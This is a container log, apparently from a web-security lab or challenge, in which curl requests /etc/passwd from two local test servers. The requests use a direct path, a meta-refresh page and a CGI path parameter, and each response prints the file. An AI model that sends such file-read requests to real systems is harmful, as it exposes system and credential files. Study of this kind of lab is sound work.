web453-goep-curl101-1  | *   Trying 172.27.0.4:3000...
web453-goep-curl101-1  | * Connected to box1 (172.27.0.4) port 3000 (#0)
web453-goep-curl101-1  | > GET /etc/passwd HTTP/1.1
web453-goep-curl101-1  | > Host: box1:3000
web453-goep-curl101-1  | > User-Agent: curl/7.86.0-DEV
web453-goep-curl101-1  | > Accept: */*
web453-goep-curl101-1  | > 
web453-goep-box1-1     | [::ffff:172.27.0.3]:53658: response:200
web453-goep-curl101-1  | * Mark bundle as not supporting multiuse
web453-goep-curl101-1  | < HTTP/1.1 200 OK
web453-goep-curl101-1  | < Date: Thu, 17 Nov 2022 13:21:00 GMT
web453-goep-curl101-1  | < Connection: close
web453-goep-curl101-1  | < Accept-Ranges: bytes
web453-goep-curl101-1  | < Last-Modified: Sun, 02 Oct 2022 21:21:57 GMT
web453-goep-curl101-1  | < ETag: "633a00f5-154"
web453-goep-curl101-1  | < Content-Length: 340
web453-goep-curl101-1  | < 
web453-goep-curl101-1  | { [340 bytes data]
web453-goep-curl101-1  | * Closing connection 0
web453-goep-curl101-1  | root:x:0:0:root:/root:/bin/sh
web453-goep-curl101-1  | daemon:x:1:1:daemon:/usr/sbin:/bin/false
web453-goep-curl101-1  | bin:x:2:2:bin:/bin:/bin/false
web453-goep-curl101-1  | sys:x:3:3:sys:/dev:/bin/false
web453-goep-curl101-1  | sync:x:4:100:sync:/bin:/bin/sync
web453-goep-curl101-1  | mail:x:8:8:mail:/var/spool/mail:/bin/false
web453-goep-curl101-1  | www-data:x:33:33:www-data:/var/www:/bin/false
web453-goep-curl101-1  | operator:x:37:37:Operator:/var:/bin/false
web453-goep-curl101-1  | nobody:x:65534:65534:nobody:/home:/bin/false
web453-goep-curl101-1  | *   Trying 172.27.0.2:3000...
web453-goep-curl101-1  | * Connected to box2 (172.27.0.2) port 3000 (#0)
web453-goep-curl101-1  | > GET /etc/passwd.html HTTP/1.1
web453-goep-curl101-1  | > Host: box2:3000
web453-goep-curl101-1  | > User-Agent: curl/7.86.0-DEV
web453-goep-curl101-1  | > Accept: */*
web453-goep-curl101-1  | > 
web453-goep-box2-1     | [::ffff:172.27.0.3]:60836: response:200
web453-goep-curl101-1  | * Mark bundle as not supporting multiuse
web453-goep-curl101-1  | < HTTP/1.1 200 OK
web453-goep-curl101-1  | < Date: Thu, 17 Nov 2022 13:21:00 GMT
web453-goep-curl101-1  | < Connection: close
web453-goep-curl101-1  | < Content-type: text/html
web453-goep-curl101-1  | < Accept-Ranges: bytes
web453-goep-curl101-1  | < Last-Modified: Thu, 17 Nov 2022 13:21:00 GMT
web453-goep-curl101-1  | < ETag: "6376353c-c1"
web453-goep-curl101-1  | < Content-Length: 193
web453-goep-curl101-1  | < 
web453-goep-curl101-1  | { [193 bytes data]
web453-goep-curl101-1  | * Closing connection 0
web453-goep-curl101-1  | <html>
web453-goep-curl101-1  | <head>
web453-goep-curl101-1  | <title>GoEP-IGoEP 2022</title>
web453-goep-curl101-1  | <meta http-equiv="Refresh" content="0; url=/cgi-bin/index.sh?path=/etc/passwd" />
web453-goep-curl101-1  | </head>
web453-goep-curl101-1  | <body>挖形成優勢策略或均衡的坑</body>
web453-goep-curl101-1  | </html>
web453-goep-curl101-1  | *   Trying 172.27.0.2:3000...
web453-goep-curl101-1  | * Connected to box2 (172.27.0.2) port 3000 (#0)
web453-goep-curl101-1  | > GET /cgi-bin/index.sh?path=/etc/passwd HTTP/1.1
web453-goep-curl101-1  | > Host: box2:3000
web453-goep-curl101-1  | > User-Agent: curl/7.86.0-DEV
web453-goep-curl101-1  | > Accept: */*
web453-goep-curl101-1  | > 
web453-goep-curl101-1  | * Mark bundle as not supporting multiuse
web453-goep-curl101-1  | < HTTP/1.1 200 OK
web453-goep-curl101-1  | < Content-Type: text/html
web453-goep-curl101-1  | * no chunk, no close, no size. Assume close to signal end
web453-goep-curl101-1  | < 
web453-goep-curl101-1  | { [17 bytes datpath=/etc/passwd
web453-goep-curl101-1  | a]
web453-goep-curl101-1  | * Closing connection 0
web453-goep-curl101-1  | /etc/passwd
web453-goep-curl101-1  | root:x:0:0:root:/root:/bin/sh
web453-goep-curl101-1  | daemon:x:1:1:daemon:/usr/sbin:/bin/false
web453-goep-curl101-1  | bin:x:2:2:bin:/bin:/bin/false
web453-goep-curl101-1  | sys:x:3:3:sys:/dev:/bin/false
web453-goep-curl101-1  | sync:x:4:100:sync:/bin:/bin/sync
web453-goep-curl101-1  | mail:x:8:8:mail:/var/spool/mail:/bin/false
web453-goep-curl101-1  | www-data:x:33:33:www-data:/var/www:/bin/false
web453-goep-curl101-1  | operator:x:37:37:Operator:/var:/bin/false
web453-goep-curl101-1  | nobody:x:65534:65534:nobody:/home:/bin/false
web453-goep-curl101-1  | *   Trying 172.27.0.2:3000...
web453-goep-curl101-1  | * Connected to box2 (172.27.0.2) port 3000 (#0)
web453-goep-curl101-1  | > GET /cgi-bin/foo.sh HTTP/1.1
web453-goep-curl101-1  | > Host: box2:3000
web453-goep-curl101-1  | > User-Agent: curl/7.86.0-DEV
web453-goep-curl101-1  | > Accept: */*
web453-goep-curl101-1  | > 
web453-goep-curl101-1  | * Mark bundle as not supporting multiuse
web453-goep-curl101-1  | < HTTP/1.1 302 Redirect
web453-goep-curl101-1  | < Location: /cgi-bin/index.sh?path=/etc/passwd
web453-goep-curl101-1  | * no chunk, no close, no size. Assume close to signal end
web453-goep-curl101-1  | < 
web453-goep-curl101-1  | * Closing connection 0
web453-goep-curl101-1  | * Issue another request to this URL: 'http://box2:3000/cgi-bin/index.sh?path=/etc/passwd'
web453-goep-curl101-1  | * Hostname box2 was found in DNS cache
web453-goep-curl101-1  | *   Trying 172.27.0.2:3000...
web453-goep-curl101-1  | * Connected to box2 (172.27.0.2) port 3000 (#1)
web453-goep-curl101-1  | > GET /cgi-bin/index.sh?path=/etc/passwd HTTP/1.1
web453-goep-curl101-1  | > Host: box2:3000
web453-goep-curl101-1  | > User-Agent: curl/7.86.0-DEV
web453-goep-curl101-1  | > Accept: */*
web453-goep-curl101-1  | > 
web453-goep-curl101-1  | * Mark bundle as not supporting multiuse
web453-goep-curl101-1  | < HTTP/1.1 200 OK
web453-goep-curl101-1  | < Content-Type: text/html
web453-goep-curl101-1  | * no chunk, no close, no size. Assume close to signal end
web453-goep-curl101-1  | < 
web453-goep-curl101-1  | { [17 bytes data]
web453-goep-curl101-1  | path=/etc/passwd
web453-goep-curl101-1  | * Closing connection 1
web453-goep-curl101-1  | /etc/passwd
web453-goep-curl101-1  | root:x:0:0:root:/root:/bin/sh
web453-goep-curl101-1  | daemon:x:1:1:daemon:/usr/sbin:/bin/false
web453-goep-curl101-1  | bin:x:2:2:bin:/bin:/bin/false
web453-goep-curl101-1  | sys:x:3:3:sys:/dev:/bin/false
web453-goep-curl101-1  | sync:x:4:100:sync:/bin:/bin/sync
web453-goep-curl101-1  | mail:x:8:8:mail:/var/spool/mail:/bin/false
web453-goep-curl101-1  | www-data:x:33:33:www-data:/var/www:/bin/false
web453-goep-curl101-1  | operator:x:37:37:Operator:/var:/bin/false
web453-goep-curl101-1  | nobody:x:65534:65534:nobody:/home:/bin/false
web453-goep-curl101-1 exited with code 0
